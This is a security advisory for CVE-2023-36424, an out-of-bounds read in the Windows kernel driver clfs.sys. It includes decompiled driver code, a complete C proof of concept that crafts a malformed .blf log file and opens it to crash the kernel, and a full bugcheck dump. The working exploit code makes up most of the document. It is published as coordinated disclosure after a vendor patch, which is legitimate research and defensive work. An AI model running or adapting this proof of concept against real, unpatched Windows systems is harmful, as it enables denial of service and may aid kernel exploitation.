**Summary**
A vulnerability exists in processing `IRP_MJ_CREATE` requests in driver `clfs.sys`. This occurs during the processing of `blf` files that are parsed in kernel.
**Credit**
An independent security researcher working with SSD Secure Disclosure.
**CVE**
CVE-2023-36424
**Affected Versions**
Windows systems running 64-bit clfs.sys with version 10.0.22621.1555
**Vendor Response**
The vendor has released a patch for this vulnerability, available at: https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36424
**Technical Analysis**
During processing truncate metadata block in CClfsLogFcbPhysical::RecoverTruncateLog driver perform checks, that all substructure fits inside metadata block:
```
dTruncateMetadataBlockPayloadSize = 1;
pTruncateMetadataBlock = 0i64;
dStatus = CClfsBaseFilePersisted::AcquireTruncateContext(
this\-\>pBaseFilePersisted,
&dTruncateMetadataBlockPayloadSize,
&pTruncateContext,
&pTruncate,
&dTruncatePayloadSize);
NTSTATUS \_\_fastcall CClfsBaseFilePersisted::AcquireTruncateContext(
CClfsBaseFilePersisted \*this,
unsigned int \*i\_pdMinimumTruncateMetadataBlockPayloadSize,
CLFS\_TRUNCATE\_CONTEXT \*\*o\_pTruncateContext,
CLFS\_TRUNCATE\_RECORD \*\*o\_pTruncatePayload,
unsigned int \*o\_dTruncatePayloadSize)
{
char flAcquiredTruncateMetadataBlock; // si
BOOLEAN v10; // r13
NTSTATUS dStatus; // ebx
CLFS\_LOG\_BLOCK\_HEADER \*pData; // r10
CLFS\_CONTROL\_RECORD \*pRecord; // rcx
NTSTATUS dStatus\_1; // \[rsp+24h\] \[rbp-34h\]
CLFS\_CONTROL\_RECORD \*pControlRecord; // \[rsp+28h\] \[rbp-30h\] BYREF
pControlRecord = 0i64;
flAcquiredTruncateMetadataBlock = 0;
\*o\_pTruncateContext = 0i64;
v10 = ExAcquireResourceExclusiveLite(this\-\>sBase.pImageResource, 1u);
dStatus = CClfsBaseFile::GetControlRecord(&this\-\>sBase, &pControlRecord);
dStatus\_1 = dStatus;
if ( dStatus \>\= 0 )
{
dStatus = CClfsBaseFile::AcquireMetadataBlock(this, TRUNCATE);
dStatus\_1 = dStatus;
if ( dStatus \>\= 0 )
{
flAcquiredTruncateMetadataBlock = 1;
pData = this\-\>sBase.pMetaBlockArray\[TRUNCATE\].pData;
if ( pData )
{
dStatus = RtlULongSub(pData-\>dBackupOffset, pData-\>dPayloadOffset, o\_dTruncatePayloadSize);
dStatus\_1 = dStatus;
if ( dStatus < 0 )
goto LABEL\_10;
if ( \*o\_dTruncatePayloadSize \>\= \*i\_pdMinimumTruncateMetadataBlockPayloadSize )
...
The requirement is that the payload size of truncate should be greater or equal to i\_pdMinimumTruncateMetadataBlockPayloadSize, which defined during call as 1.
But further driver dereference fields at offsets 0x8 and 0xc inside truncate:
bool \_\_fastcall CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid(
\_\_int64 a1,
CLFS\_TRUNCATE\_RECORD \*i\_pTruncate,
unsigned int i\_dTruncatePayloadSize)
{
unsigned int dOffsetToOwnerPage; // ecx
unsigned int dOffsetToClientChange; // edx
bool v5; // cc
dOffsetToOwnerPage = i\_pTruncate-\>dOffsetToOwnerPage;
if ( dOffsetToOwnerPage < 0x10 )
return 0;
dOffsetToClientChange = i\_pTruncate-\>dOffsetToClientChange;
if ( dOffsetToClientChange < 0x10
...
00000000 CLFS\_TRUNCATE struc
00000000 field\_0 dq ?
00000008 dOffsetToClientChange dd ?
0000000C dOffsetToOwnerPage dd ?
00000010 field\_10 dq ?
00000018 field\_18 dq ?
00000020 field\_20 dd ?
00000024 field\_24 dd ?
00000028 CLFS\_TRUNCATE\_RECORD ends
As a result OOB read occurs.
To reproduce the crash it can be useful to use following command (enable special pool for driver):
verifier /flags 0x1 /driver clfs.sys
**Proof of Concept**
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
UINT32 CRC32Reflect(UINT32 a, UINT8 b) {
UINT32 result = 0;
UINT8 j = 1;
for (UINT32 i = a; j <\= b; ++j) {
if (i & 1)
result |= 1 << (b - j);
i \>>\= 1;
}
return result;
}
UINT32 CRC32Compute(UINT8\* buffer, size\_t buflen) {
UINT32 polynomial = 0x4C11DB7;
UINT32 crcTable\[0x100\] = { 0 };
for (int i = 0; i < 0x100; ++i) {
UINT32 tmp1 = CRC32Reflect(i, 8);
INT32 tmp2 = tmp1 << 24;
for (int j = 8; j \> 0; --j) {
tmp2 = 2 \* tmp2 ^ ((tmp2 \>> 31) & 0x4C11DB7);
}
crcTable\[i\] = CRC32Reflect(tmp2, 0x20);
}
UINT32 result = 0xffffffff;
for (size\_t i = 0; i < buflen; ++i) {
result = (result \>> 8) ^ crcTable\[(UINT8)result ^ buffer\[i\]\];
}
return ~result;
}
UINT32 ClfsEncodeBlockPrivate(UINT8\* block, UINT32 sectorSize, UINT32 a3, UINT32 a4) {
if (!\*(UINT16\*)(block + 4) || \*(UINT16\*)(block + 6) < \*(UINT16\*)(block + 4) || \*(UINT16\*)(block + 4) << 9 \> sectorSize)
return 0xC01A000A;
if (a4 \> 0x10)
return 0xC000000D;
if (!(a3 & 0x10111))
return 0xC000000D;
if ((\*(UINT32\*)(block + 0x10) & 1))
return 0xC01A000A;
UINT32 backupOffset = \*(UINT32\*)(block + 0x68);
UINT16\* backup = (UINT16\*)(block + backupOffset);
UINT32 sectorCount = sectorSize \>> 9;
if ((backupOffset & 7) || ((backupOffset + 2 \* sectorCount) \> sectorSize))
return 0xC01A000A;
for (UINT32 i = 0; i < sectorCount; ++i) {
UINT8 flag = a4 | ((i) ? 0x0 : 0x40) | ((sectorCount - 1 != i) ? 0x0 : 0x20);
UINT16 checksum = ((a3 << 8) & 0xff00) | (flag & 0xff);
backup\[i\] = \*(UINT16\*)(block + 0x1fe + (i << 9));
\*(UINT16\*)(block + 0x1fe + (i << 9)) = checksum;
}
\*(UINT32\*)(block + 0x10) = (\*(UINT32\*)(block + 0x10) & 0xFFFFFFFD) | 1;
return 0;
}
void ClfsEncodeBlock(UINT8\* block) {
ClfsEncodeBlockPrivate(block, \*(UINT16\*)(block + 4) << 9, \*(UINT8\*)(block + 2), 0x10);
\*(UINT32\*)(block + 0xc) = CRC32Compute(block, \*(UINT16\*)(block + 4) << 9);
}
char\* generateBLF() {
char curPathA\[MAX\_PATH\] = { 0 };
GetCurrentDirectoryA(MAX\_PATH, curPathA);
wchar\_t curPathW\[MAX\_PATH\] = { 0 };
GetCurrentDirectoryW(MAX\_PATH, curPathW);
char\* CLFSPath = new char\[MAX\_PATH\];
memset(CLFSPath, 0, MAX\_PATH \* sizeof(char));
strcat\_s(CLFSPath, MAX\_PATH, curPathA);
strcat\_s(CLFSPath, MAX\_PATH, "\\\\ssd\_01");
char\* BLFPath = new char\[MAX\_PATH\];
memset(BLFPath, 0, MAX\_PATH \* sizeof(char));
strcat\_s(BLFPath, MAX\_PATH, CLFSPath);
strcat\_s(BLFPath, MAX\_PATH, ".blf");
wchar\_t\* containerPath = new wchar\_t\[MAX\_PATH\];
memset(containerPath, 0, MAX\_PATH \* sizeof(wchar\_t));
wchar\_t\* containerPathTmp = new wchar\_t\[MAX\_PATH\];
memset(containerPathTmp, 0, MAX\_PATH \* sizeof(wchar\_t));
wcscat\_s(containerPath, MAX\_PATH, L"\\\\??\\\\");
wcscat\_s(containerPath, MAX\_PATH, curPathW);
wcscat\_s(containerPath, MAX\_PATH, L"\\\\ssd\_01");
wcscat\_s(containerPathTmp, MAX\_PATH, curPathW);
wcscat\_s(containerPathTmp, MAX\_PATH, L"\\\\ssd\_01");
size\_t filesize = 0x400 + 0x400 + 0x2000 + 0x2000 + 0x2000 + 0x2000;
UINT8\* filebuf = new UINT8\[filesize\];
memset(filebuf, 0, filesize);
\*(UINT16\*)(filebuf + 0x0 + 0x0) = 0x15;
\*(UINT16\*)(filebuf + 0x0 + 0x2) = 0x1;
\*(UINT16\*)(filebuf + 0x0 + 0x4) = 0x400 \>> 9;
\*(UINT16\*)(filebuf + 0x0 + 0x6) = 0x400 \>> 9;
\*(UINT16\*)(filebuf + 0x0 + 0x28) = 0x70;
\*(UINT16\*)(filebuf + 0x0 + 0x68) = (0x400 - 2 \* (0x400 \>> 9)) & (~7);
\*(UINT64\*)(filebuf + 0x0 + 0x70 + 8) = 0xC1F5C1F500005F1C;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x28 + 0x0) = 0x3;
\*(UINT64\*)(filebuf + 0x0 + 0x70 + 0x28 + 0x8) = 0x0;
\*(UINT64\*)(filebuf + 0x0 + 0x70 + 0x28 + 0x10) = 0x10000;
\*(UINT64\*)(filebuf + 0x0 + 0x70 + 0x48) = 0x6;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 8) = 0x400;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x20) = 0x400;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x24) = 0x400;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x28) = 0x1;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x38) = 0x2000;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x3c) = 0x800;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x40) = 0x2;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x50) = 0x2000;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x54) = 0x2800;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x58) = 0x3;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x68) = 0x200;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x6c) = 0x4800;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x70) = 0x4;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x80) = 0x200;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x84) = 0x4a00;
\*(UINT32\*)(filebuf + 0x0 + 0x70 + 0x50 + 0x88) = 0x5;
// BASELOG record
\*(UINT16\*)(filebuf + 0x800 + 0x0) = 0x15;
\*(UINT16\*)(filebuf + 0x800 + 0x2) = 0x1;
\*(UINT16\*)(filebuf + 0x800 + 0x4) = 0x2000 \>> 9;
\*(UINT16\*)(filebuf + 0x800 + 0x6) = 0x2000 \>> 9;
\*(UINT16\*)(filebuf + 0x800 + 0x28) = 0x70;
\*(UINT16\*)(filebuf + 0x800 + 0x68) = (0x2000 - 2 \* (0x2000 \>> 9)) & (~7);
// sHashTable1Entries
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x18) = 0x1338;
// sHashTable2Entries
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x70) = 0x14f0;
// dContainersCount
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x12c) = 0x1;
// sClientSymbolOffsetsArray
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x138) = 0x1368;
// sContainerSymbolOffsetsArray
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x32c) = 0x1520;
// dLastAvailableSymOffset
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1328) = 0x800;
// dContainerCount
\*(UINT8\*)(filebuf + 0x800 + 0x70 + 0x1334) = 0x1;
// CLFS\_CLIENT\_CONTEXT
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x0) = 0xC1FDF006;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x4) = 0x30;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x8) = 0x0;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0xc) = 0xb8;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x20) = 0x13f0;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x24) = 0x1368;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x0) = 0xC1FDF007;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x4) = 0x88;
\*(UINT64\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x8) = 0x100000000;
\*(UINT8\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x10) = 0x1;
\*(UINT8\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x11) = 0x0;
\*(UINT16\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x12) = 0x0;
\*(UINT16\*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x24) = 0x1;
\*(UINT16\*)(filebuf + 0x800 + 0x70 + 0x13f0) = 0x0;
// CLFS\_CONTAINER\_CONTEXT
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x0) = 0xC1FDF006;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x4) = 0x30;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x8) = 0x0;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0xc) = 0xb8;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x20) = 0x1550;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x24) = 0x1520;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x0) = 0xC1FDF008;
\*(UINT32\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x4) = 0x30;
\*(UINT64\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x8) = 0x80000;
\*(UINT8\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x10) = 0x1;
\*(UINT8\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x11) = 0x0;
\*(UINT16\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x12) = 0x0;
\*(UINT16\*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x24) = 0x1;
wcscpy\_s((wchar\_t\*)(filebuf + 0x800 + 0x70 + 0x1550), MAX\_PATH, containerPath);
\*(UINT16\*)(filebuf + 0x4800 + 0x0) = 0x15;
\*(UINT16\*)(filebuf + 0x4800 + 0x2) = 0x1;
\*(UINT16\*)(filebuf + 0x4800 + 0x4) = 0x200 \>> 9;
\*(UINT16\*)(filebuf + 0x4800 + 0x6) = 0x200 \>> 9;
\*(UINT16\*)(filebuf + 0x4800 + 0x28) = 0x1f7;
\*(UINT32\*)(filebuf + 0x4800 + 0x68) = (0x200 - 2 \* (0x200 \>> 9)) & (~7);
ClfsEncodeBlock(filebuf + 0x0);
ClfsEncodeBlock(filebuf + 0x800);
ClfsEncodeBlock(filebuf + 0x4800);
DeleteFileA(BLFPath);
DeleteFileW(containerPathTmp);
HANDLE hBLFFile = CreateFileA(BLFPath, GENERIC\_ALL, 0, NULL, CREATE\_NEW, FILE\_ATTRIBUTE\_NORMAL, 0);
if (hBLFFile == INVALID\_HANDLE\_VALUE) {
printf("CreateFileW failed: %x\\n", GetLastError());
return NULL;
}
DWORD written = 0;
if (!WriteFile(hBLFFile, filebuf, filesize, &written, NULL)) {
printf("WriteFile failed: %x\\n", GetLastError());
return NULL;
}
CloseHandle(hBLFFile);
return CLFSPath;
}
bool triggerCLFS() {
char\* newfilepath = generateBLF();
if (!newfilepath) {
printf("failed generateBLF");
return \-1;
}
char fullfilepath\[MAX\_PATH\] = { 0 };
strcat\_s(fullfilepath, "\\\\\\\\.\\\\LOG:\\\\??\\\\");
strcat\_s(fullfilepath, newfilepath);
HANDLE hFile = CreateFileA(fullfilepath, GENERIC\_READ, 0, NULL, OPEN\_ALWAYS, FILE\_ATTRIBUTE\_NORMAL, 0);
CloseHandle(hFile);
return true;
}
int main(int argc, char\* argv\[\]) {
if (!triggerCLFS()) {
printf("failed triggerCLFS");
return \-1;
}
return 0;
}
```
**Crash dump**
```
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*
\* \*
\* Bugcheck Analysis \*
\* \*
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*
PAGE\_FAULT\_IN\_NONPAGED\_AREA (50)
Invalid system memory was referenced. This cannot be protected by try\-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffc8050a59b003, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff8072f73111c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000000, (reserved)
Debugging Details:
\------------------
KEY\_VALUES\_STRING: 1
Key : AV.Type
Value: Read
Key : Analysis.CPU.mSec
Value: 2311
Key : Analysis.DebugAnalysisManager
Value: Create
Key : Analysis.Elapsed.mSec
Value: 28648
Key : Analysis.Init.CPU.mSec
Value: 5936
Key : Analysis.Init.Elapsed.mSec
Value: 2337520
Key : Analysis.Memory.CommitPeak.Mb
Value: 112
Key : WER.OS.Branch
Value: ni\_release
Key : WER.OS.Timestamp
Value: 2022\-05\-06T12:50:00Z
Key : WER.OS.Version
Value: 10.0.22621.1
BUGCHECK\_CODE: 50
BUGCHECK\_P1: ffffc8050a59b003
BUGCHECK\_P2: 0
BUGCHECK\_P3: fffff8072f73111c
BUGCHECK\_P4: 0
READ\_ADDRESS: ffffc8050a59b003 Special pool
MM\_INTERNAL\_CODE: 0
IMAGE\_NAME: CLFS.SYS
MODULE\_NAME: CLFS
FAULTING\_MODULE: fffff8072f720000 CLFS
PROCESS\_NAME: ssd\_01.exe
TRAP\_FRAME: ffffb08615db7f00 -- (.trap 0xffffb08615db7f00)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=00000000000001ff rbx=0000000000000000 rcx=0000000000000200
rdx=ffffc8050a59aff7 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8072f73111c rsp=ffffb08615db8098 rbp=ffffb08615db8750
r8=0000000000000001 r9=0000000000000001 r10=ffffc8050a59ae00
r11=ffffb30440fea000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid:
fffff807\`2f73111c 8b4a0c mov ecx,dword ptr \[rdx+0Ch\] ds:ffffc805\`0a59b003=????????
Resetting default scope
STACK\_TEXT:
ffffb086\`15db74c8 fffff807\`2e972062 : ffffb086\`15db7630 fffff807\`2e73a510 ffffdd00\`55de0180 ffffc805\`0a59b001 : nt!DbgBreakPointWithStatus
ffffb086\`15db74d0 fffff807\`2e971753 : ffffdd00\`00000003 ffffb086\`15db7630 fffff807\`2e85c680 ffffb086\`15db7be0 : nt!KiBugCheckDebugBreak+0x12
ffffb086\`15db7530 fffff807\`2e8434a7 : 00000000\`00000000 00000000\`00000000 00000000\`00000000 ffffc805\`0a59b003 : nt!KeBugCheck2+0xba3
ffffb086\`15db7ca0 fffff807\`2e8befe9 : 00000000\`00000050 ffffc805\`0a59b003 00000000\`00000000 ffffb086\`15db7f00 : nt!KeBugCheckEx+0x107
ffffb086\`15db7ce0 fffff807\`2e7054dc : ffffb304\`3c061150 00000000\`00000000 ffffb086\`15db7e99 00000000\`00000000 : nt!MiSystemFault+0x1bca29
ffffb086\`15db7de0 fffff807\`2e853f29 : 00000000\`00004a00 ffffc805\`0a59ce00 ffffb304\`40fe8164 00000000\`00000000 : nt!MmAccessFault+0x29c
ffffb086\`15db7f00 fffff807\`2f73111c : fffff807\`2f7495e8 ffffb304\`40fea000 00000000\`00000000 ffffb304\`40f8bee0 : nt!KiPageFault+0x369
ffffb086\`15db8098 fffff807\`2f7495e8 : ffffb304\`40fea000 00000000\`00000000 ffffb304\`40f8bee0 ffffb304\`40fe8480 : CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid
ffffb086\`15db80a0 fffff807\`2f722d16 : ffffb304\`40fe8000 ffffb304\`40f8bee0 00000000\`00000001 ffffc805\`0a596c98 : CLFS!CClfsLogFcbPhysical::RecoverTruncateLog+0x9c
ffffb086\`15db8100 fffff807\`2f755ade : ffffb304\`40fe8000 00000000\`00000001 ffffb304\`3f704ac0 ffffb304\`00120089 : CLFS!CClfsLogFcbPhysical::Initialize+0x94a
ffffb086\`15db8220 fffff807\`2f754bdb : ffffb304\`3f0fe1a0 ffffccf8\`51200001 00000000\`00000000 fffff807\`2f750000 : CLFS!CClfsRequest::Create+0x67a
ffffb086\`15db8370 fffff807\`2f75416e : ffffb304\`3f0fe1a0 ffffb304\`3c211d50 ffffb304\`3c5fd640 00000000\`00000001 : CLFS!CClfsRequest::Dispatch+0x7f
ffffb086\`15db83c0 fffff807\`2f7540b7 : ffffb304\`3c5fd640 ffffb304\`3c5fd640 ffffb304\`3c5fd640 00000000\`00000040 : CLFS!ClfsDispatchIoRequest+0x8e
ffffb086\`15db8410 fffff807\`2e656275 : 00000000\`00000000 fffff807\`2e65e303 00000000\`00000000 ffffb304\`3c211d50 : CLFS!CClfsDriver::LogIoDispatch+0x27
ffffb086\`15db8440 fffff807\`2eac1ae9 : 00000000\`00000000 ffffb086\`15db8750 ffffb304\`3c5fd640 ffffb304\`40f8b580 : nt!IofCallDriver+0x55
ffffb086\`15db8480 fffff807\`2eabd217 : fffff807\`2eac1220 fffff807\`2eac1220 00000000\`00000001 ffffb304\`3c0f6900 : nt!IopParseDevice+0x8c9
ffffb086\`15db8650 fffff807\`2eabc642 : ffffc805\`09c1adf0 ffffb086\`15db8880 00000000\`00000040 ffffb304\`3c0f6e80 : nt!ObpLookupObjectName+0x697
ffffb086\`15db87f0 fffff807\`2ead1e29 : 00000000\`00000000 ffffb304\`3f2ebaa0 00000048\`03bdf420 00000000\`00000001 : nt!ObOpenObjectByNameEx+0x1f2
ffffb086\`15db8920 fffff807\`2ead19d9 : 00000048\`03bdf3c0 00000000\`00000000 00000048\`03bdf420 00000048\`03bdf3c8 : nt!IopCreateFile+0x439
ffffb086\`15db89e0 fffff807\`2e8580e8 : 00000000\`00000000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : nt!NtCreateFile+0x79
ffffb086\`15db8a70 00007ff9\`924ef6f4 : 00007ff9\`8fcdaa60 00000000\`00000080 00000000\`00000000 00000000\`642f0000 : nt!KiSystemServiceCopyEnd+0x28
00000048\`03bdf338 00007ff9\`8fcdaa60 : 00000000\`00000080 00000000\`00000000 00000000\`642f0000 00000000\`00000000 : ntdll!NtCreateFile+0x14
00000048\`03bdf340 00007ff9\`8fcda2d8 : 00000048\`03bdf500 00007ff9\`0000003e 00000177\`d5370001 00000000\`00000000 : KERNELBASE!CreateFileInternal+0x590
00000048\`03bdf4b0 00007ff6\`662e2bc8 : 00000000\`00000000 00000048\`03bdf6b4 00000000\`00000000 00000048\`03bdf580 : KERNELBASE!CreateFileA+0xe8
00000048\`03bdf540 00007ff6\`662e2d48 : 00007ff6\`662f50a3 00000000\`00000016 00000177\`00000000 00007ff9\`4d2203c8 : ssd\_01!triggerCLFS+0xb8
00000048\`03bdf7d0 00007ff6\`662e37a9 : 0000ea95\`00000001 00000177\`d5379950 00000000\`00000000 00007ff6\`662e4eed : ssd\_01!main+0x28
00000048\`03bdf8d0 00007ff6\`662e364e : 00007ff6\`662eb000 00007ff6\`662eb220 00000000\`00000000 00000000\`00000000 : ssd\_01!invoke\_main+0x39
00000048\`03bdf920 00007ff6\`662e350e : 00000000\`00000000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : ssd\_01!\_\_scrt\_common\_main\_seh+0x12e
00000048\`03bdf990 00007ff6\`662e383e : 00000000\`00000000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : ssd\_01!\_\_scrt\_common\_main+0xe
00000048\`03bdf9c0 00007ff9\`91b2269d : 00000048\`03cbd000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : ssd\_01!mainCRTStartup+0xe
00000048\`03bdf9f0 00007ff9\`924aa9f8 : 00000000\`00000000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : KERNEL32!BaseThreadInitThunk+0x1d
00000048\`03bdfa20 00000000\`00000000 : 00000000\`00000000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : ntdll!RtlUserThreadStart+0x28
SYMBOL\_NAME: CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid+0
STACK\_COMMAND: .cxr; .ecxr ; kb
BUCKET\_ID\_FUNC\_OFFSET: 0
FAILURE\_BUCKET\_ID: AV\_VRF\_R\_(null)\_CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid
OS\_VERSION: 10.0.22621.1
BUILDLAB\_STR: ni\_release
OSPLATFORM\_TYPE: x64
OSNAME: Windows 10
FAILURE\_ID\_HASH: {be87c7fe-0f3f-c3b0-3400\-56d9576bc7ff}
Followup: MachineOwner
\---------
```
Unavailable Comments